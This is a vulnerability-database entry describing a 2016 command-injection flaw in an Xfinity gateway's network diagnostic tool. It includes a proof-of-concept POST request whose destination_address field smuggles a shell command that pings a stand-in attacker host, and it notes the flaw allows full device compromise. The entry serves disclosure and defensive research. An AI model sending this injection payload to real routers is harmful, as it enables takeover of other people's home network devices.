ID
VAR-E-201612-0455
TITLE
Xfinity Gateway - Remote Code Execution Vulnerability
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | xfinity | model: | gateway | scope: | - | version: | - | Trust: 0.6 |
EXPLOIT
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: [email protected]
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution Vulnerability
Trust: 0.6
EXTERNAL IDS
| db: | 0DAYTODAY | id: | 26462 | Trust: 0.6 |
| db: | EDBNET | id: | 89421 | Trust: 0.6 |
REFERENCES
| url: | https://0day.today/exploits/26462 | Trust: 0.6 |
SOURCES
| db: | EDBNET | id: | 89421 |
LAST UPDATE DATE
2022-07-27T10:00:43.692000+00:00
SOURCES RELEASE DATE
| db: | EDBNET | id: | 89421 | date: | 2016-12-05T00:00:00 |